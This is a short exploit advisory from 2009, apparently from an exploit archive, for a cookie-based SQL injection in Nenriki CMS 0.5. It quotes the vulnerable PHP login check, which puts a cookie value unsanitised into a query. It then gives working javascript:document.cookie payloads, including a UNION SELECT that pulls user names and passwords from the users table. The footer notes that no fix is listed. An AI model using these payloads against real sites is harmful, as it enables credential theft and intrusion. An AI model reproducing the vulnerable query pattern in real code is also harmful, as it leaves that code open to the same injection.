Nenriki Cms 0.5 (COOKIE) Remote SQL Injection Vulnerability

2009-03-10 16:33:26

#########################################################################################
[0x01] Informations:
Name : Nenriki Cms 0.5
Download : Source Forge
Vulnerability : Sql Injection By Cookie
Author : x0r
Contact : [email protected]
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:
Bugged Page: index.php
[Code]
If($_COOKIE['password']) {
$query=("select * from users where(ID='" . $_COOKIE['ID'] . "')"); //get password
$result=mysql_db_query($linkvars['DB'], $query, $link);
while($row=mysql_fetch_array($result)) {
If($_COOKIE['password']==$row['password']) {
$admin['inline'] = true;
$admin['privs'] = $row['privs'];
}
}
}
[/code]
#########################################################################################
[0x03] Exploits:
Exploits: javascript:document.cookie ="password=1; path=/" then
javascript:document.cookie ="ID=' union select 0,0,0,concat(id,name,char(58),password),0,0 from users--; path=/"
########################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.